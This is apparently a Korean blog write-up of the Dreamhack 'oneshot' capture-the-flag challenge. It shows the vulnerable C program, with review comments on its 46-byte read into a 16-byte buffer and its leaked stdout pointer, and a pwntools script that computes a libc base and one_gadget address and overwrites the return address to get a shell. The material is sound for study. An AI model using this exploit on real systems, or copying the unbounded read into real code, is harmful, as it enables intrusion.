외로운 Nova의 작업실



dreamhack - oneshot write up

Nova_ 2023. 4. 21. 14:30

- source code

// gcc -o oneshot1 oneshot1.c -fno-stack-protector -fPIC -pie

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

/*
 * SIGALRM handler registered by initialize(): prints "TIME OUT" and ends the
 * process with exit status -1.
 *
 * NOTE(review): puts() and exit() are not async-signal-safe. That is harmless
 * in a short-lived challenge binary, but a production handler should restrict
 * itself to calls such as write() and _exit().
 */
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

/*
 * Per-run setup: switches stdin and stdout to unbuffered mode and arms a
 * 60-second alarm whose SIGALRM is routed to alarm_handler().
 */
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);   /* _IONBF: no stdio buffering on input */
    setvbuf(stdout, NULL, _IONBF, 0);  /* _IONBF: output is written immediately */
    signal(SIGALRM, alarm_handler);    /* handler prints a message and exits */
    alarm(60);                         /* the session is cut off after 60 seconds */
}

/*
 * Challenge entry point: prints the value of the stdout pointer, reads one
 * message from fd 0 and echoes it back.
 *
 * NOTE(review): this is the deliberately vulnerable function of the exercise.
 * msg holds 16 bytes, yet read() is allowed to store up to 46, so input can
 * run as far as 30 bytes past the buffer into neighbouring stack data. The
 * build line at the top of the listing passes -fno-stack-protector, so the
 * frame carries no compiler-inserted canary. In real code the remedy is to
 * bound the read by sizeof(msg) (leaving room for a terminator) and to keep
 * the stack protector enabled.
 */
int main(int argc, char *argv[]) {
    char msg[16];
    /* Never assigned again below, so it can only become non-zero if the
     * oversized read spills into it. Presumably it sits next to msg on the
     * stack; the actual layout is compiler-dependent, so confirm in the binary. */
    size_t check = 0;

    initialize();

    /* Discloses a runtime pointer belonging to the C library's stdio state.
     * The write-up's script derives the library load address from this value,
     * so the address randomisation implied by -pie does not protect the
     * library here. */
    printf("stdout: %p\n", stdout);

    printf("MSG: ");
    /* Length 46 exceeds sizeof(msg) == 16: the out-of-bounds write happens here. */
    read(0, msg, 46);

    /* Hand-rolled guard: exit immediately if check was disturbed. It only
     * tests for a non-zero value, so it is not equivalent to a random canary. */
    if(check > 0) {
        exit(0);
    }

    /* read() does not append a terminator; if the input contains no zero
     * byte, %s keeps printing past the end of msg. */
    printf("MSG: %s\n", msg);
    /* Clears only the 16 bytes of msg. memset() is declared in <string.h>,
     * which this listing does not include. */
    memset(msg, 0, sizeof(msg));
    return 0;
}

 

- exploit code

from pwn import *

# Connect to the challenge instance used in the write-up (presumably a
# session-specific host and port; the listing gives no further context).
p = remote("23.81.42.210", 9729)

# Read the pointer that the program prints after "stdout: ", up to but not
# including the newline.
# NOTE(review): str arguments rely on pwntools converting them to bytes under
# Python 3; bytes literals would be explicit.
p.recvuntil("stdout: ")
stdout = p.recvuntil("\n")[:-1]

# Step 1: parse the hex text and derive the library load base from it.
# Both constants are offsets inside one particular library build (presumably
# the libc shipped with the challenge - confirm against that file); they do
# not carry over to any other build.
stdout = int(stdout, 16)
lib_base = stdout - 0x3c5620
one_gadget = lib_base + 0x45216

# Step 2: build the input: 24 filler bytes, 8 zero bytes, 8 filler bytes, then
# the 8-byte packed address (48 bytes in total).
# Presumably the zero bytes cover `check` so the program's `check > 0` test
# does not exit early, and the packed value lands on main's saved return
# address; the stack layout is not shown in the listing, so confirm it.
# The program's read() accepts at most 46 bytes, so the last two bytes of
# these 48 are not consumed by that call.
payload = b"A"*24 + b"\x00"*8 + b"B"*8
payload += p64(one_gadget)

# Send the oversized message in reply to the "MSG: " prompt.
p.send(payload)

# Print whatever the program sends back next.
print(p.recv())

# Hand the connection over to the terminal.
p.interactive()